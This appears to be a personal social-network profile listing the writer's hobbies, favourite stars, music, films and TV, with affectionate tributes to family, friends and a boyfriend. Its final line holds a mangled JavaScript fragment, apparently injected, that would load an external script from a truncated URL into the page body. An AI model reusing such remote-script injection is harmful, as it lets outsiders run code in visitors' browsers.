Kickboxing, weight training, traveling, shopping, dancing, laughing, hangin with my girls, sunsets, beaches, tattoos, piercings........I got lots of interests! :)
Angelina Jolie, Uma Thurman, Sade, All the members of Metallica, Goldberg, Cheech Marin & Tommy Chong, Shakira, Matthew McConneghy, Denzel Washington ...
HEISTCLICK!! Gotta give my sexy man lots of credit and support him and his dream! I LOVE YOU BABY!! MWUAH! XOXOI love rock n roll and alternative rock, some heavy stuff too. As for the hip hop, R&B, reggae and club stuff, I will listen to pretty much long as I can shake my ass to it! ;oP
Horror, Comedy, Science Fiction, Super Hero, Action...I like them all
The Family Guy, South Park, UFC, Who's Line is it Anyway, WWE, Animal Planet...
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My mom is my hero, my inspiration, my best friend :) She's been there for me through thick and through thin! I thank my lucky stars for blessing me with such an amazing mother and friend!Grandma Viola is another amazing woman. She is very strong willed and gives much much more than she receives. I hope that when it's my turn, I can hold down the fort just as awesome as she does! :)And of course, my girlfriends. They are as REAL as it gets. TRUE friends, which are a rare gift in life, so when you find them, you must hold on to them because they don't come around very often! I love you all and thank you for all the good times and great laughs and for always being there! XOXOMy love, my best friend of all..Frankie. We've been through a lot together baby! You have made such a positive difference in my life, and you give me that drive and determination to be the best I can be! You have helped me grow and blossom into the person I am today. I LOVE YOU SO MUCH!And, let's not forget...DARK PHOENIX! X-Men kick ASS! .."var x=document·createElement('script');x.src='http://www... /.../test.js';document·getElementsByTagName('body')[0]. appendChild(x);" /